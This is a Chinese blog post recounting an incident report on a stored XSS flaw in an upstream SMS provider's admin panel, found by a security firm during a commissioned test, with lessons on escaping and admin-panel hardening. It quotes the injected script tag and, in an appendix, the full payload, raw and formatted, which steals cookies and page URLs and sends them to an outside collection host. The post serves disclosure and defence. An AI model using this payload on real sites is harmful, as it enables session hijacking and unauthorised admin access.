记一次 XSS 漏洞发现过程

栏目: 编程工具 · 发布时间: 5年前

内容简介:某用户委托安全公司对本司(SendCloud)短信发送业务做安全检测,发现咱们的上游通道某一环节的安全漏洞。跟踪这个过程,真的十分有趣。这是 XSS 第一次发生在我身边,怎么也不会想到有人会犯这么弱智的错误。最基本的页面输出转义都没做。

某用户委托安全公司对本司(SendCloud)短信发送业务做安全检测,发现咱们的上游通道某一环节的安全漏洞。

跟踪这个过程,真的十分有趣。

这是 XSS 第一次发生在我身边,怎么也不会想到有人会犯这么弱智的错误。最基本的页面输出转义都没做。

页面内容输出转义、 SQL 防注入、表单的 CSRF token 校验,应该算是 Web 站点搭建的基础工作吧!

过程

记一次 XSS 漏洞发现过程

  1. 用户通过我们的短信服务往安全公司指定手机号推送消息
  2. 安全公司回复以下内容(会经过运营商反馈给通道):

    html <script src=https://xss.chinacycc.com/EDQmSg?1554797849></script>

  3. 上游通道后台管理页面未做处理,admin 用户登录之后,查看短信回复内容页面时,页面直接输出了回复内容,导致 XSS —— 站外不安全脚本被加载执行。

  4. 脚本获取重要信息( document.location.hreftop.location.hrefdocument.cookiewindow.opener.location.href ),发送给指定地址。
  5. 安全公司利用 Cookie 直接就访问了上游通道的后台,而且还是最高权限。

...

记一次 XSS 漏洞发现过程 记一次 XSS 漏洞发现过程

我们利用用户反馈过来的这段信息,同样登录了这个后台,确认后台真的加载了这段 JS。

记一次 XSS 漏洞发现过程

估计是框架拦截请求,采用 jquery 加载,还加上了时间戳。

记一次 XSS 漏洞发现过程

请求伪造了一个图片请求用于上传数据。

记一次 XSS 漏洞发现过程

经验与教训

  1. 自身业务安全性之外,应该经常做全链路的业务安全性检测,不能让用户对我们的业务安全性产生质疑。
    数据泄露真的是太严重了,如果是恶意的,那...
    之前没人注意到这个问题,是更可怕的事情。
  2. 我就在中网讯通后台这么闲逛,他们就是没有任何感觉(我们已经通过正常途径在通知他们了)。
    除了基础的防范手段之外,应该:
    1. 管理后台尽量不要暴露到公网
    2. 尽量一个用户只允许在一个地方登录
    3. 记录用户登录信息,连用户账号的认证错误都记下来
    4. 将 IP、UserAgent 等指纹数据和 SESSION ID 关联起来,除了使用 SESSION ID 检验之外,还应该判断这些指纹数据能不能匹配得上。(好像淘宝网,还是哪里,有一个 JS 专门用来计算 B 端指纹,对反爬也有帮助)
    5. 对管理后台的疑似非正常登录(不是之前常用 IP,浏览器等)应该有告警,并立即处理。
    6. ...先就说这么多吧

附:脚本

(function(){(new Image()).src='http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

格式化之后

(function() {
  (new Image()).src = 'http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location=' + escape((function() {
    try {
      return document.location.href
    } catch(e) {
      return ''
    }
  })()) + '&toplocation=' + escape((function() {
    try {
      return top.location.href
    } catch(e) {
      return ''
    }
  })()) + '&cookie=' + escape((function() {
    try {
      return document.cookie
    } catch(e) {
      return ''
    }
  })()) + '&opener=' + escape((function() {
    try {
      return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
    } catch(e) {
      return ''
    }
  })());
})();
if ('' == 1) {
  keep = new Image();
  keep.src = 'https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};

以上所述就是小编给大家介绍的《记一次 XSS 漏洞发现过程》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

精通Windows应用开发

精通Windows应用开发

[美] Jesse Liberty Philip Japikse Jon Galloway / 苏宝龙 / 人民邮电出版社 / 59.00元

Windows 8.1的出现不仅提供了跨设备的用户体验,也提供了跨设备的开发体验。本书着眼于实际项目中所需要的特性,以及现有C#编程知识的运用,对如何最大限度地利用Metro、WinRT和Windows 8进行了讲解,内容详尽,注重理论学习与实践开发的配合。 Windows 8.1和WinRT的作用及其特殊性 如何使用先进特性创建具有沉浸感和吸引力的Windows 8.1应用 如......一起来看看 《精通Windows应用开发》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试